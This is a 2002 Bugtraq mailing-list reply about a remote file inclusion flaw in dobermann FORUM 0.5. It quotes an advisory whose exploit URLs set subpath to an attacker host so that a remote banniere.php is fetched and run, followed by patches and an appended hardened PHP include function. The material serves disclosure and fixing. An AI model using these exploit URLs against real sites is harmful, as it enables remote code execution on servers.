[27631] in bugtraq
RE: dobermann FORUM (php)
daemon@ATHENA.MIT.EDU (Mark Stunnenberg)
Tue Oct 29 12:26:21 2002
From: "Mark Stunnenberg" <marksg@chello.nl>
To: "'Frog Man'" <leseulfrog@hotmail.com>, <bugtraq@securityfocus.com>
Date: Tue, 29 Oct 2002 10:00:22 +0100
Message-ID: <97637D952F5B27468F0BDF32F912DB1E0C63AC@spain.gac.nl>
In-Reply-To: <97637D952F5B27468F0BDF32F912DB1E15F42C@spain.gac.nl>
Or place a:
--------------------
<? $subpath = ''; ?>
--------------------
Right above the place where the actual $subpath is being set.
Mark
> -----Original Message-----
> From: Frog Man [mailto:leseulfrog@hotmail.com]
> Sent: Sunday 27 October 2002 23:53
> To: bugtraq@securityfocus.com
> Subject: dobermann FORUM (php)
>
>
> Information :
> °°°°°°°°°°°°°°
> Product : dobermann FORUM
> version : 0.5
> website : http://www.le-dobermann.com
> Problem : Include file
>
> PHP Code/location :
> °°°°°°°°°°°°°°°°°°°
> entete.php
> enteteacceuil.php
> topic/entete.php :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
>
> index.php
> newtopic.php :
> ------------------------
> @require "config.php";
> @include("entete.php");
> ------------------------
>
> Exploits :
> °°°°°°°°°°
> http://[target]/entete.php?subpath=http://[attacker]/
> http://[target]/enteteacceuil.php?subpath=http://[attacker]/
> http://[target]/topic/entete.php?subpath=http://[attacker]/
> http://[target]/index.php?subpath=http://[attacker]/
> http://[target]/newtopic.php?subpath=http://[attacker]/
> with
> http://[attacker]/banniere.php
>
> Patch :
> °°°°°°°
> In files :
> ------------------
> entete.php
> enteteacceuil.php
> topic/entete.php
> ------------------
> replace the line :
> ------------------------------------------
> <?php @include $subpath."banniere.php"; ?>
> ------------------------------------------
> by :
> ------------------------------------------
> <?php
> $banfile=$subpath."banniere.php";
> if (file_exists($banfile)){
> @include $banfile; }
> ?>
> ------------------------------------------
>
>
>
> More details in French :
> http://www.frog-man.org/tutos/dobermannFORUM.txt
> translated by Google :
> http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
>
> frog-m@n
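
An added example, not part of either message and not dobermann FORUM code: a stricter form of the include fix discussed above, which resolves `$subpath."banniere.php"` against a fixed forum root and refuses anything that is not an allowlisted file under that root. The function name `resolve_include`, the allowlist and the temporary directory layout are assumptions made for illustration.

```php
<?php
// Added example, not dobermann FORUM code. The directory layout, the
// allowlist and resolve_include() are assumptions made for illustration.

/** Return the absolute path of $subpath.$file only if it is an allowlisted
 *  regular file located under $root; return null for anything else. */
function resolve_include(string $root, string $subpath, string $file, array $allowed): ?string
{
    if (!in_array($file, $allowed, true)) {
        return null;                       // only known template names
    }
    // Refuse stream wrappers (http://, ftp://, ...) and NUL bytes.
    if (preg_match('#^\s*[a-z][a-z0-9+.-]*:#i', $subpath) || strpos($subpath, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    $target   = realpath($root . '/' . $subpath . $file);
    if ($rootReal === false || $target === false || !is_file($target)) {
        return null;                       // missing file or unresolvable path
    }
    // realpath() has collapsed "../" and symlinks; the result must stay under the root.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed sample layout: <tmp>/forum/banniere.php, <tmp>/forum/topic/,
// plus a second banniere.php one level above the forum root.
$tmp  = sys_get_temp_dir() . '/dobermann_demo_' . getmypid();
$root = $tmp . '/forum';
mkdir($root . '/topic', 0700, true);
file_put_contents($root . '/banniere.php', "<?php echo \"banner\\n\";");
file_put_contents($tmp . '/banniere.php', "<?php echo \"outside root\\n\";");

// Constructed $subpath values, in the form the query string of the URLs
// quoted above would supply them when the script never sets $subpath itself.
$samples = ['', 'topic/../', '../', 'http://attacker.example/'];
foreach ($samples as $subpath) {
    $path = resolve_include($root, $subpath, 'banniere.php', ['banniere.php']);
    printf("%-28s => %s\n", var_export($subpath, true), $path === null ? 'rejected' : 'include ' . $path);
    if ($path !== null) {
        include $path;                     // no @: failures should be visible
    }
}
```

On current PHP, `allow_url_include` is off by default, which blocks the `http://` case on its own; the containment check still matters for local paths.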